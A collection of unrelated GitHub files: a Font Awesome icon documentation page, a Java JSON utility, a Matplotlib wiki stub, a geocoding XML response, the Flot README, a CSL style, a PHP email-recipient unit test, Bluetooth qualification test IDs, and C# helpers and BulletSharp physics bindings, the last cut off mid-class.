<a class="brand" href="../../"><i class="icon-flag"></i> Font Awesome</a>
<div class="nav-collapse collapse">
<ul class="nav">
<li class="hidden-tablet "><a href="../../">Home</a></li>
<li><a href="../../get-started/">Get Started</a></li>
<li class="dropdown-split-left"><a href="../../icons/">Icons</a></li>
<li class="dropdown dropdown-split-right hidden-phone">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="icon-caret-down"></i>
</a>
<ul class="dropdown-menu pull-right">
<li><a href="../../icons/"><i class="icon-flag icon-fixed-width"></i> Icons</a></li>
<li class="divider"></li>
<li><a href="../../icons/#new"><i class="icon-shield icon-fixed-width"></i> New Icons in 3.2.1</a></li>
<li><a href="../../icons/#web-application"><i class="icon-camera-retro icon-fixed-width"></i> Web Application Icons</a></li>
<li><a href="../../icons/#currency"><i class="icon-won icon-fixed-width"></i> Currency Icons</a></li>
<li><a href="../../icons/#text-editor"><i class="icon-file-text-alt icon-fixed-width"></i> Text Editor Icons</a></li>
<li><a href="../../icons/#directional"><i class="icon-hand-right icon-fixed-width"></i> Directional Icons</a></li>
<li><a href="../../icons/#video-player"><i class="icon-play-sign icon-fixed-width"></i> Video Player Icons</a></li>
<li><a href="../../icons/#brand"><i class="icon-github icon-fixed-width"></i> Brand Icons</a></li>
<li><a href="../../icons/#medical"><i class="icon-medkit icon-fixed-width"></i> Medical Icons</a></li>
</ul>
</li>
<li class="dropdown-split-left"><a href="../../examples/">Examples</a></li>
<li class="dropdown dropdown-split-right hidden-phone">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<i class="icon-caret-down"></i>
</a>
<ul class="dropdown-menu pull-right">
<li><a href="../../examples/">Examples</a></li>
<li class="divider"></li>
<li><a href="../../examples/#new-styles">New Styles</a></li>
<li><a href="../../examples/#inline-icons">Inline Icons</a></li>
<li><a href="../../examples/#larger-icons">Larger Icons</a></li>
<li><a href="../../examples/#bordered-pulled">Bordered & Pulled</a></li>
<li><a href="../../examples/#buttons">Buttons</a></li>
<li><a href="../../examples/#button-groups">Button Groups</a></li>
<li><a href="../../examples/#button-dropdowns">Button Dropdowns</a></li>
<li><a href="../../examples/#bulleted-lists">Bulleted Lists</a></li>
<li><a href="../../examples/#navigation">Navigation</a></li>
<li><a href="../../examples/#form-inputs">Form Inputs</a></li>
<li><a href="../../examples/#animated-spinner">Animated Spinner</a></li>
<li><a href="../../examples/#rotated-flipped">Rotated & Flipped</a></li>
<li><a href="../../examples/#stacked">Stacked</a></li>
<li><a href="../../examples/#custom">Custom CSS</a></li>
</ul>
</li>
<li><a href="../../whats-new/">
<span class="hidden-tablet">What's </span>New</a>
</li>
<li><a href="../../community/">Community</a></li>
<li><a href="../../license/">License</a></li>
</ul>
<ul class="nav pull-right">
<li><a href="http://blog.fontawesome.io">Blog</a></li>
</ul>
</div>
</div>
</div>
</div>
<div class="jumbotron jumbotron-icon">
<div class="container">
<div class="info-icons">
<i class="icon-minus-sign-alt icon-6"></i>
<span class="hidden-phone">
<i class="icon-minus-sign-alt icon-5"></i>
<span class="hidden-tablet"><i class="icon-minus-sign-alt icon-4"></i> </span>
<i class="icon-minus-sign-alt icon-3"></i>
<i class="icon-minus-sign-alt icon-2"></i>
</span>
<i class="icon-minus-sign-alt icon-1"></i>
</div>
<h1 class="info-class">
icon-minus-sign-alt
<small>
<i class="icon-minus-sign-alt"></i> ·
Unicode: <span class="upper">f146</span> ·
Created: v3.1 ·
Categories:
Web Application Icons
</small>
</h1>
</div>
</div>
<div class="container">
<section>
<div class="row-fluid">
<div class="span9">
<p>After you get <a href="../../integration/">up and running</a>, you can place Font Awesome icons just about anywhere with the <code><i></code> tag:</p>
<div class="well well-transparent">
<div style="font-size: 24px; line-height: 1.5em;">
<i class="icon-minus-sign-alt"></i> icon-minus-sign-alt
</div>
</div>
<div class="highlight"><pre><code class="html"><span class="nt"><i</span> <span class="na">class=</span><span class="s">"icon-minus-sign-alt"</span><span class="nt">></i></span> icon-minus-sign-alt
</code></pre></div>
<br>
<div class="lead"><i class="icon-info-sign"></i> Looking for more? Check out the <a href="../../examples/">examples</a>.</div>
</div>
<div class="span3">
<div class="info-ad"><div id="carbonads-container"><div class="carbonad"><div id="azcarbon"></div><script type="text/javascript">var z = document.createElement("script"); z.type = "text/javascript"; z.async = true; z.src = "http://engine.carbonads.com/z/32291/azcarbon_2_1_0_VERT"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(z, s);</script></div></div>
</div>
</div>
</div>
</section>
</div>
<div class="push"><!-- necessary for sticky footer --></div>
</div>
<footer class="footer hidden-print">
<div class="container text-center">
<div>
<i class="icon-flag"></i> Font Awesome 3.2.1
<span class="hidden-phone">·</span><br class="visible-phone">
Created and Maintained by <a href="http://twitter.com/davegandy">Dave Gandy</a>
</div>
<div>
Font Awesome licensed under <a href="http://scripts.sil.org/OFL">SIL OFL 1.1</a>
<span class="hidden-phone">·</span><br class="visible-phone">
Code licensed under <a href="http://opensource.org/licenses/mit-license.html">MIT License</a>
<span class="hidden-phone hidden-tablet">·</span><br class="visible-phone visible-tablet">
Documentation licensed under <a href="http://creativecommons.org/licenses/by/3.0/">CC BY 3.0</a>
</div>
<div>
Thanks to <a href="http://maxcdn.com"><i class="icon-maxcdn"></i> MaxCDN</a> for providing the excellent <a href="http://www.bootstrapcdn.com/#tab_fontawesome">BootstrapCDN for Font Awesome</a>
</div>
<div class="project">
<a href="https://github.com/FortAwesome/Font-Awesome">GitHub Project</a> ·
<a href="https://github.com/FortAwesome/Font-Awesome/issues">Issues</a>
</div>
</div>
</footer>
<script src="http://platform.twitter.com/widgets.js"></script>
<script src="../../assets/js/jquery-1.7.1.min.js"></script>
<script src="../../assets/js/ZeroClipboard-1.1.7.min.js"></script>
<script src="../../assets/js/bootstrap-2.3.1.min.js"></script>
<script src="../../assets/js/site.js"></script>
</body>
</html>
| {
"pile_set_name": "Github"
} |
package cms.utils;
import java.io.IOException;
import java.text.SimpleDateFormat;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.DeserializationFeature;
import com.fasterxml.jackson.databind.JsonSerializer;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializerProvider;
import com.fasterxml.jackson.databind.module.SimpleModule;
import com.fasterxml.jackson.databind.ser.std.ToStringSerializer;
/**
import org.codehaus.jackson.map.DeserializationConfig.Feature;
import org.codehaus.jackson.map.ObjectMapper;
import org.codehaus.jackson.map.ser.StdSerializerProvider;
import org.codehaus.jackson.type.TypeReference;
**/
/**
* Jackson扩展封装
*
*/
public class JsonUtils {
private static final Logger logger = LogManager.getLogger(JsonUtils.class);
final static ObjectMapper objectMapper;
static {
objectMapper = new ObjectMapper();
//设置null转换""
//objectMapper.getSerializerProvider().setNullValueSerializer(new NullSerializer());
objectMapper.setDateFormat(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"));
//JSON转POJO时,若JSON中的某个字段在POJO中未定义,在默认情况下会抛异常转换失败,只要增加这个配置
objectMapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
//序列换成json时,将所有的long变成string,因为js中的数字类型不能包含所有的java long值
SimpleModule simpleModule = new SimpleModule();
simpleModule.addSerializer(Long.class, ToStringSerializer.instance);
simpleModule.addSerializer(Long.TYPE, ToStringSerializer.instance);
objectMapper.registerModule(simpleModule);
// jackson2HttpMessageConverter.setObjectMapper(objectMapper);
// converters.add(jackson2HttpMessageConverter);
}
public static ObjectMapper getObjectMapper() {
return objectMapper;
}
//null的JSON序列
private static class NullSerializer extends JsonSerializer<Object> {
public void serialize(Object value, JsonGenerator jgen,
SerializerProvider provider) throws IOException,
JsonProcessingException {
jgen.writeString("");
}
}
/**
* JSON串转换为Java泛型对象,可以是各种类型,此方法最为强大。用法看测试用例。
* @param <T>
* @param jsonString JSON字符串
* @param tr TypeReference,例如: new TypeReference< List<FamousUser> >(){}
* @return List对象列表
*/
public static <T> T toGenericObject(String jsonString, TypeReference<T> tr) {
if (jsonString == null || "".equals(jsonString)) {
return null;
} else {
try {
return objectMapper.readValue(jsonString, tr);
} catch (Exception e) {
// e.printStackTrace();
if (logger.isErrorEnabled()) {
logger.error("JSON串转换为Java泛型对象",e);
}
}
}
return null;
}
/**
* Java对象转Json字符串
* 本方法转换后字符串可以兼容各浏览器
* @param object Java对象,可以是对象,数组,List,Map等
* @return json 字符串
*/
public static String toJSONString(Object object) {
String jsonString = "";
try {
jsonString = objectMapper.writeValueAsString(object);
} catch (Exception e) {
//e.printStackTrace();
if (logger.isErrorEnabled()) {
logger.error("Java对象转Json字符串",e);
}
}
return jsonString;
}
/**
* Json字符串转Java对象
* @param jsonString
* @param c
* @return
*/
public static <T> T toObject(String jsonString, Class<?> c) {
if (jsonString == null || "".equals(jsonString)) {
return (T) "";
} else {
try {
return (T)objectMapper.readValue(jsonString, c);
} catch (Exception e) {
if (logger.isErrorEnabled()) {
logger.error("Json字符串转Java对象",e);
}
}
}
return (T) "";
}
}
| {
"pile_set_name": "Github"
} |
+++
title = "Category:Matplotlib"
description = ""
date = 2018-03-10T17:39:33Z
aliases = []
[extra]
id = 2527
[taxonomies]
categories = []
tags = []
+++
{{library}}
'''Matplotlib''' is a plotting library for the [[Python]] programming language
and its numerical mathematics extension [[NumPy]].
It can do 3D-plots, but the focus is on 2D-plotting.
Website: http://matplotlib.org/
There is a procedural "pylab" interface based on a state machine
(like [[OpenGL]]), designed to closely resemble that of [[MATLAB]],
see [http://matplotlib.org/api/pyplot_summary.html Plotting commands summary]
and [http://matplotlib.org/faq/usage_faq.html#matplotlib-pyplot-and-pylab-how-are-they-related pyplot-and-pylab].
[[:Category:SciPy|SciPy]] makes use of matplotlib.
;See also: [[Gnuplot]]
[[Category:SciPy]]
[[Category:Python]]
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="http://tempuri.org/">{
"Info": [
{
"IsSuccess": "True",
"InAddress": "高雄市旗山區中正路197號",
"InSRS": "EPSG:4326",
"InFuzzyType": "[單雙號機制]+[最近門牌號機制]",
"InFuzzyBuffer": "0",
"InIsOnlyFullMatch": "False",
"InIsLockCounty": "True",
"InIsLockTown": "False",
"InIsLockVillage": "False",
"InIsLockRoadSection": "False",
"InIsLockLane": "False",
"InIsLockAlley": "False",
"InIsLockArea": "False",
"InIsSameNumber_SubNumber": "True",
"InCanIgnoreVillage": "True",
"InCanIgnoreNeighborhood": "True",
"InReturnMaxCount": "0",
"OutTotal": "1",
"OutMatchType": "完全比對",
"OutMatchCode": "[高雄市]\tFULL:1",
"OutTraceInfo": "[高雄市]\t { 完全比對 } 找到符合的門牌地址"
}
],
"AddressList": [
{
"FULL_ADDR": "高雄市旗山區湄洲里22鄰中正路197號",
"COUNTY": "高雄市",
"TOWN": "旗山區",
"VILLAGE": "湄洲里",
"NEIGHBORHOOD": "22鄰",
"ROAD": "中正路",
"SECTION": "",
"LANE": "",
"ALLEY": "",
"SUB_ALLEY": "",
"TONG": "",
"NUMBER": "197號",
"X": 120.479888,
"Y": 22.889792
}
]
}</string> | {
"pile_set_name": "Github"
} |
{
"ver": "1.0.1",
"uuid": "e26ed980-1f6d-4dbc-9d68-e389367d3e4b",
"isSubpackage": false,
"subpackageName": "",
"subMetas": {}
} | {
"pile_set_name": "Github"
} |
namespace System
{
internal struct ParamsArray
{
// Sentinel fixed-length arrays eliminate the need for a "count" field keeping this
// struct down to just 4 fields. These are only used for their "Length" property,
// that is, their elements are never set or referenced.
private static readonly object[] oneArgArray = new object[1];
private static readonly object[] twoArgArray = new object[2];
private static readonly object[] threeArgArray = new object[3];
private readonly object arg0;
private readonly object arg1;
private readonly object arg2;
// After construction, the first three elements of this array will never be accessed
// because the indexer will retrieve those values from arg0, arg1, and arg2.
private readonly object[] args;
public ParamsArray(object arg0)
{
this.arg0 = arg0;
this.arg1 = null;
this.arg2 = null;
// Always assign this.args to make use of its "Length" property
this.args = oneArgArray;
}
public ParamsArray(object arg0, object arg1)
{
this.arg0 = arg0;
this.arg1 = arg1;
this.arg2 = null;
// Always assign this.args to make use of its "Length" property
this.args = twoArgArray;
}
public ParamsArray(object arg0, object arg1, object arg2)
{
this.arg0 = arg0;
this.arg1 = arg1;
this.arg2 = arg2;
// Always assign this.args to make use of its "Length" property
this.args = threeArgArray;
}
public ParamsArray(object[] args)
{
int len = args.Length;
this.arg0 = len > 0 ? args[0] : null;
this.arg1 = len > 1 ? args[1] : null;
this.arg2 = len > 2 ? args[2] : null;
this.args = args;
}
public int Length
{
get { return this.args.Length; }
}
public object this[int index]
{
get { return index == 0 ? this.arg0 : GetAtSlow(index); }
}
private object GetAtSlow(int index)
{
if (index == 1)
return this.arg1;
if (index == 2)
return this.arg2;
return this.args[index];
}
}
}
| {
"pile_set_name": "Github"
} |
# Flot [](https://travis-ci.org/flot/flot)
## About ##
Flot is a Javascript plotting library for jQuery.
Read more at the website: <http://www.flotcharts.org/>
Take a look at the the examples in examples/index.html; they should give a good
impression of what Flot can do, and the source code of the examples is probably
the fastest way to learn how to use Flot.
## Installation ##
Just include the Javascript file after you've included jQuery.
Generally, all browsers that support the HTML5 canvas tag are
supported.
For support for Internet Explorer < 9, you can use [Excanvas]
[excanvas], a canvas emulator; this is used in the examples bundled
with Flot. You just include the excanvas script like this:
```html
<!--[if lte IE 8]><script language="javascript" type="text/javascript" src="excanvas.min.js"></script><![endif]-->
```
If it's not working on your development IE 6.0, check that it has
support for VML which Excanvas is relying on. It appears that some
stripped down versions used for test environments on virtual machines
lack the VML support.
You can also try using [Flashcanvas][flashcanvas], which uses Flash to
do the emulation. Although Flash can be a bit slower to load than VML,
if you've got a lot of points, the Flash version can be much faster
overall. Flot contains some wrapper code for activating Excanvas which
Flashcanvas is compatible with.
You need at least jQuery 1.2.6, but try at least 1.3.2 for interactive
charts because of performance improvements in event handling.
## Basic usage ##
Create a placeholder div to put the graph in:
```html
<div id="placeholder"></div>
```
You need to set the width and height of this div, otherwise the plot
library doesn't know how to scale the graph. You can do it inline like
this:
```html
<div id="placeholder" style="width:600px;height:300px"></div>
```
You can also do it with an external stylesheet. Make sure that the
placeholder isn't within something with a display:none CSS property -
in that case, Flot has trouble measuring label dimensions which
results in garbled looks and might have trouble measuring the
placeholder dimensions which is fatal (it'll throw an exception).
Then when the div is ready in the DOM, which is usually on document
ready, run the plot function:
```js
$.plot($("#placeholder"), data, options);
```
Here, data is an array of data series and options is an object with
settings if you want to customize the plot. Take a look at the
examples for some ideas of what to put in or look at the
[API reference](API.md). Here's a quick example that'll draw a line
from (0, 0) to (1, 1):
```js
$.plot($("#placeholder"), [ [[0, 0], [1, 1]] ], { yaxis: { max: 1 } });
```
The plot function immediately draws the chart and then returns a plot
object with a couple of methods.
## What's with the name? ##
First: it's pronounced with a short o, like "plot". Not like "flawed".
So "Flot" rhymes with "plot".
And if you look up "flot" in a Danish-to-English dictionary, some of
the words that come up are "good-looking", "attractive", "stylish",
"smart", "impressive", "extravagant". One of the main goals with Flot
is pretty looks.
## Notes about the examples ##
In order to have a useful, functional example of time-series plots using time
zones, date.js from [timezone-js][timezone-js] (released under the Apache 2.0
license) and the [Olson][olson] time zone database (released to the public
domain) have been included in the examples directory. They are used in
examples/axes-time-zones/index.html.
[excanvas]: http://code.google.com/p/explorercanvas/
[flashcanvas]: http://code.google.com/p/flashcanvas/
[timezone-js]: https://github.com/mde/timezone-js
[olson]: http://ftp.iana.org/time-zones
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US">
<!-- Generated with https://github.com/citation-style-language/utilities/tree/master/generate_dependent_styles/data/taylor-and-francis -->
<info>
<title>Asian Anthropology</title>
<id>http://www.zotero.org/styles/asian-anthropology</id>
<link href="http://www.zotero.org/styles/asian-anthropology" rel="self"/>
<link href="http://www.zotero.org/styles/taylor-and-francis-chicago-author-date" rel="independent-parent"/>
<link href="http://www.tandfonline.com/action/authorSubmission?journalCode=RAAN20&page=instructions" rel="documentation"/>
<category citation-format="author-date"/>
<category field="humanities"/>
<issn>1683-478X</issn>
<eissn>2168-4227</eissn>
<updated>2014-05-17T12:00:00+00:00</updated>
<rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights>
</info>
</style>
| {
"pile_set_name": "Github"
} |
<?php
namespace Oro\Bundle\EmailBundle\Tests\Unit\Provider;
use Oro\Bundle\EmailBundle\Model\Recipient;
use Oro\Bundle\EmailBundle\Provider\EmailRecipientsProvider;
class EmailRecipientsProviderTest extends \PHPUnit\Framework\TestCase
{
protected $emailRecipientsHelper;
protected $emailRecipientsProvider;
protected function setUp(): void
{
$translator = $this->createMock('Symfony\Contracts\Translation\TranslatorInterface');
$translator->expects($this->any())
->method('trans')
->will($this->returnCallback(function ($id) {
return $id;
}));
$this->emailRecipientsHelper = $this->getMockBuilder('Oro\Bundle\EmailBundle\Provider\EmailRecipientsHelper')
->disableOriginalConstructor()
->getMock();
$this->emailRecipientsHelper->expects($this->any())
->method('createRecipientData')
->will($this->returnCallback(function (Recipient $recipient) {
return [
'id' => $recipient->getName(),
'text' => $recipient->getName(),
];
}));
$this->emailRecipientsProvider = new EmailRecipientsProvider($translator, $this->emailRecipientsHelper);
}
public function testGetEmailRecipientsShouldReturnEmptyArrayIfThereAreNoProviders()
{
$this->assertEmpty($this->emailRecipientsProvider->getEmailRecipients());
}
/**
* @dataProvider dataProvider
*/
public function testGetEmailRecipients(array $providers, array $expectedRecipients, $limit = 100)
{
$this->emailRecipientsProvider->setProviders($providers);
$actualRecipients = $this->emailRecipientsProvider->getEmailRecipients(null, null, null, $limit);
$this->assertEquals($expectedRecipients, $actualRecipients);
}
public function dataProvider()
{
return [
[
[
$this->createProvider('section1', [
new Recipient('[email protected]', 'Recipient <[email protected]>'),
new Recipient('[email protected]', 'Recipient2 <[email protected]>'),
]),
],
[
[
'text' => 'section1',
'children' => [
[
'id' => 'Recipient <[email protected]>',
'text' => 'Recipient <[email protected]>',
],
[
'id' => 'Recipient2 <[email protected]>',
'text' => 'Recipient2 <[email protected]>',
],
],
]
],
],
[
[
$this->createProvider('section1', [
new Recipient('[email protected]', 'Recipient <[email protected]>'),
new Recipient('[email protected]', 'Recipient2 <[email protected]>'),
]),
$this->createProvider('section2', [
new Recipient('[email protected]', 'Recipient3 <[email protected]>'),
]),
],
[
[
'text' => 'section1',
'children' => [
[
'id' => 'Recipient <[email protected]>',
'text' => 'Recipient <[email protected]>',
],
[
'id' => 'Recipient2 <[email protected]>',
'text' => 'Recipient2 <[email protected]>',
],
],
],
[
'text' => 'section2',
'children' => [
[
'id' => 'Recipient3 <[email protected]>',
'text' => 'Recipient3 <[email protected]>',
],
],
],
],
],
[
[
$this->createProvider('section1', [
new Recipient('[email protected]', 'Recipient <[email protected]>'),
new Recipient('[email protected]', 'Recipient2 <[email protected]>'),
]),
$this->createProvider('section2', [
new Recipient('[email protected]', 'Recipient3 <[email protected]>'),
], 0),
],
[
[
'text' => 'section1',
'children' => [
[
'id' => 'Recipient <[email protected]>',
'text' => 'Recipient <[email protected]>',
],
[
'id' => 'Recipient2 <[email protected]>',
'text' => 'Recipient2 <[email protected]>',
],
],
],
],
2,
],
];
}
/**
* @param string $section
* @param array $provided
* @param int $recipientExactly
*
* @return \PHPUnit\Framework\MockObject\MockObject
*/
protected function createProvider($section, array $provided, $recipientExactly = 1)
{
$provider = $this->createMock('Oro\Bundle\EmailBundle\Provider\EmailRecipientsProviderInterface');
$provider->expects($this->any())
->method('getSection')
->will($this->returnValue($section));
$provider->expects($this->exactly($recipientExactly))
->method('getRecipients')
->will($this->returnValue($provided));
return $provider;
}
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2007, Clarius Consulting, Manas Technology Solutions, InSTEDD, and Contributors.
// All rights reserved. Licensed under the BSD 3-Clause License; see License.txt.
namespace Moq.Tests.FSharpTypes
open System;
type HasProperty() =
let mutable property = new obj()
abstract Property: obj with get, set
default this.Property with get() = property and set(value: obj) = property <- value
| {
"pile_set_name": "Github"
} |
# Copyright 2019 Oticon A/S
# SPDX-License-Identifier: Apache-2.0
GAP/GAT/BV-01-C
GAP/GAT/BV-02-C
GAP/GAT/BV-03-C
GAP/GAT/BV-04-C
GAP/GAT/BV-05-C
GAP/IDLE/NAMP/BV-01-C
GAP/GAT/BX-01-C
GATT/SR/GAC/BV-01-C
GATT/SR/GAD/BV-01-C
GATT/SR/GAD/BV-02-C
GATT/SR/GAD/BV-03-C
GATT/SR/GAD/BV-04-C
GATT/SR/GAD/BV-05-C
GATT/SR/GAD/BV-06-C
GATT/SR/GAR/BV-01-C
GATT/SR/GAR/BI-01-C
GATT/SR/GAR/BI-02-C
GATT/SR/GAR/BI-03-C
GATT/SR/GAR/BI-04-C
GATT/SR/GAR/BV-03-C
GATT/SR/GAR/BI-06-C
GATT/SR/GAR/BI-07-C
GATT/SR/GAR/BI-09-C
GATT/SR/GAR/BI-10-C
GATT/SR/GAR/BI-11-C
GATT/SR/GAR/BV-04-C
GATT/SR/GAR/BI-12-C
GATT/SR/GAR/BI-13-C
GATT/SR/GAR/BI-14-C
GATT/SR/GAR/BI-15-C
GATT/SR/GAR/BI-16-C
GATT/SR/GAR/BI-17-C
GATT/SR/GAR/BV-05-C
GATT/SR/GAR/BI-18-C
GATT/SR/GAR/BI-19-C
GATT/SR/GAR/BI-20-C
GATT/SR/GAR/BI-21-C
GATT/SR/GAR/BI-22-C
GATT/SR/GAR/BV-06-C
GATT/SR/GAR/BV-07-C
GATT/SR/GAW/BV-01-C
GATT/SR/GAW/BV-03-C
GATT/SR/GAW/BI-02-C
GATT/SR/GAW/BI-03-C
GATT/SR/GAW/BI-04-C
GATT/SR/GAW/BI-05-C
GATT/SR/GAW/BI-06-C
GATT/SR/GAW/BV-05-C
GATT/SR/GAW/BI-07-C
GATT/SR/GAW/BI-08-C
GATT/SR/GAW/BI-09-C
GATT/SR/GAW/BI-11-C
GATT/SR/GAW/BI-12-C
GATT/SR/GAW/BI-13-C
GATT/SR/GAW/BV-08-C
GATT/SR/GAW/BV-09-C
GATT/SR/GAW/BV-11-C
GATT/SR/GAW/BI-32-C
GATT/SR/GAW/BI-33-C
GATT/SR/GAN/BV-01-C
GATT/SR/GAI/BV-01-C
GATT/SR/GAS/BV-01-C
GATT/SR/UNS/BI-01-C
GATT/SR/UNS/BI-02-C
GATT/SR/GPA/BV-01-C
GATT/SR/GPA/BV-02-C
GATT/SR/GPA/BV-03-C
GATT/SR/GPA/BV-04-C
GATT/SR/GPA/BV-05-C
GATT/SR/GPA/BV-06-C
GATT/SR/GPA/BV-07-C
GATT/SR/GPA/BV-08-C
GATT/SR/GPA/BV-12-C
| {
"pile_set_name": "Github"
} |
using System;
using BulletSharp.Math;
using static BulletSharp.UnsafeNativeMethods;
namespace BulletSharp
{
public class UsageBitfield
{
internal IntPtr Native;
internal UsageBitfield(IntPtr native)
{
Native = native;
}
public void Reset()
{
btUsageBitfield_reset(Native);
}
public bool Unused1
{
get => btUsageBitfield_getUnused1(Native);
set => btUsageBitfield_setUnused1(Native, value);
}
public bool Unused2
{
get => btUsageBitfield_getUnused2(Native);
set => btUsageBitfield_setUnused2(Native, value);
}
public bool Unused3
{
get => btUsageBitfield_getUnused3(Native);
set => btUsageBitfield_setUnused3(Native, value);
}
public bool Unused4
{
get => btUsageBitfield_getUnused4(Native);
set => btUsageBitfield_setUnused4(Native, value);
}
public bool UsedVertexA
{
get => btUsageBitfield_getUsedVertexA(Native);
set => btUsageBitfield_setUsedVertexA(Native, value);
}
public bool UsedVertexB
{
get => btUsageBitfield_getUsedVertexB(Native);
set => btUsageBitfield_setUsedVertexB(Native, value);
}
public bool UsedVertexC
{
get => btUsageBitfield_getUsedVertexC(Native);
set => btUsageBitfield_setUsedVertexC(Native, value);
}
public bool UsedVertexD
{
get => btUsageBitfield_getUsedVertexD(Native);
set => btUsageBitfield_setUsedVertexD(Native, value);
}
}
public class SubSimplexClosestResult : IDisposable
{
internal IntPtr Native;
internal SubSimplexClosestResult(IntPtr native)
{
Native = native;
}
public SubSimplexClosestResult()
{
Native = btSubSimplexClosestResult_new();
}
public void Reset()
{
btSubSimplexClosestResult_reset(Native);
}
public void SetBarycentricCoordinates()
{
btSubSimplexClosestResult_setBarycentricCoordinates(Native);
}
public void SetBarycentricCoordinates(double a)
{
btSubSimplexClosestResult_setBarycentricCoordinates2(Native, a);
}
public void SetBarycentricCoordinates(double a, double b)
{
btSubSimplexClosestResult_setBarycentricCoordinates3(Native, a, b);
}
public void SetBarycentricCoordinates(double a, double b, double c)
{
btSubSimplexClosestResult_setBarycentricCoordinates4(Native, a, b, c);
}
public void SetBarycentricCoordinates(double a, double b, double c, double d)
{
btSubSimplexClosestResult_setBarycentricCoordinates5(Native, a, b, c,
d);
}
/*
public doubleArray BarycentricCoords
{
get { return btSubSimplexClosestResult_getBarycentricCoords(Native); }
}
*/
public Vector3 ClosestPointOnSimplex
{
get
{
Vector3 value;
btSubSimplexClosestResult_getClosestPointOnSimplex(Native, out value);
return value;
}
set => btSubSimplexClosestResult_setClosestPointOnSimplex(Native, ref value);
}
public bool Degenerate
{
get => btSubSimplexClosestResult_getDegenerate(Native);
set => btSubSimplexClosestResult_setDegenerate(Native, value);
}
public bool IsValid => btSubSimplexClosestResult_isValid(Native);
public UsageBitfield UsedVertices
{
get => new UsageBitfield(btSubSimplexClosestResult_getUsedVertices(Native));
set => btSubSimplexClosestResult_setUsedVertices(Native, value.Native);
}
public void Dispose()
{
Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (Native != IntPtr.Zero)
{
btSubSimplexClosestResult_delete(Native);
Native = IntPtr.Zero;
}
}
~SubSimplexClosestResult()
{
Dispose(false);
}
}
public class VoronoiSimplexSolver : IDisposable
{
internal IntPtr Native;
private bool _preventDelete;
internal VoronoiSimplexSolver(IntPtr native, bool preventDelete)
{
Native = native;
_preventDelete = preventDelete;
}
public VoronoiSimplexSolver()
{
Native = btVoronoiSimplexSolver_new();
}
public void AddVertexRef(ref Vector3 w, ref Vector3 p, ref Vector3 q)
{
btVoronoiSimplexSolver_addVertex(Native, ref w, ref p, ref q);
}
public void AddVertex(Vector3 w, Vector3 p, Vector3 q)
{
btVoronoiSimplexSolver_addVertex(Native, ref w, ref p, ref q);
}
public void BackupClosest(out Vector3 v)
{
btVoronoiSimplexSolver_backup_closest(Native, out v);
}
public bool Closest(out Vector3 v)
{
return btVoronoiSimplexSolver_closest(Native, out v);
}
public bool ClosestPtPointTetrahedronRef(ref Vector3 p, ref Vector3 a, ref Vector3 b, ref Vector3 c,
ref Vector3 d, SubSimplexClosestResult finalResult)
{
return btVoronoiSimplexSolver_closestPtPointTetrahedron(Native, ref p,
ref a, ref b, ref c, ref d, finalResult.Native);
}
public bool ClosestPtPointTetrahedron(Vector3 p, Vector3 a, Vector3 b, Vector3 c,
Vector3 d, SubSimplexClosestResult finalResult)
{
return btVoronoiSimplexSolver_closestPtPointTetrahedron(Native, ref p,
ref a, ref b, ref c, ref d, finalResult.Native);
}
public bool ClosestPtPointTriangleRef(ref Vector3 p, ref Vector3 a, ref Vector3 b, ref Vector3 c,
SubSimplexClosestResult result)
{
return btVoronoiSimplexSolver_closestPtPointTriangle(Native, ref p,
ref a, ref b, ref c, result.Native);
}
public bool ClosestPtPointTriangle(Vector3 p, Vector3 a, Vector3 b, Vector3 c,
SubSimplexClosestResult result)
{
return btVoronoiSimplexSolver_closestPtPointTriangle(Native, ref p,
ref a, ref b, ref c, result.Native);
}
public void ComputePoints(out Vector3 p1, out Vector3 p2)
{
btVoronoiSimplexSolver_compute_points(Native, out p1, out p2);
}
public bool EmptySimplex()
{
return btVoronoiSimplexSolver_emptySimplex(Native);
}
public bool FullSimplex()
{
return btVoronoiSimplexSolver_fullSimplex(Native);
}
/*
public int GetSimplex(Vector3[] pBuf, Vector3[] qBuf, Vector3[] yBuf)
{
return btVoronoiSimplexSolver_getSimplex(Native, pBuf, qBuf,
yBuf);
}
*/
public bool InSimplex(Vector3 w)
{
return btVoronoiSimplexSolver_inSimplex(Native, ref w);
}
public double MaxVertex()
{
return btVoronoiSimplexSolver_maxVertex(Native);
}
public int PointOutsideOfPlane(Vector3 p, Vector3 a, Vector3 b, Vector3 c,
Vector3 d)
{
return btVoronoiSimplexSolver_pointOutsideOfPlane(Native, ref p, ref a,
ref b, ref c, ref d);
}
public void ReduceVertices(UsageBitfield usedVerts)
{
btVoronoiSimplexSolver_reduceVertices(Native, usedVerts.Native);
}
public void RemoveVertex(int index)
{
btVoronoiSimplexSolver_removeVertex(Native, index);
}
public void Reset()
{
btVoronoiSimplexSolver_reset(Native);
}
public bool UpdateClosestVectorAndPoints()
{
return btVoronoiSimplexSolver_updateClosestVectorAndPoints(Native);
}
public SubSimplexClosestResult CachedBC
{
get => new SubSimplexClosestResult(btVoronoiSimplexSolver_getCachedBC(Native));
set => btVoronoiSimplexSolver_setCachedBC(Native, value.Native);
}
public Vector3 CachedP1
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getCachedP1(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setCachedP1(Native, ref value);
}
public Vector3 CachedP2
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getCachedP2(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setCachedP2(Native, ref value);
}
public Vector3 CachedV
{
get
{
Vector3 value;
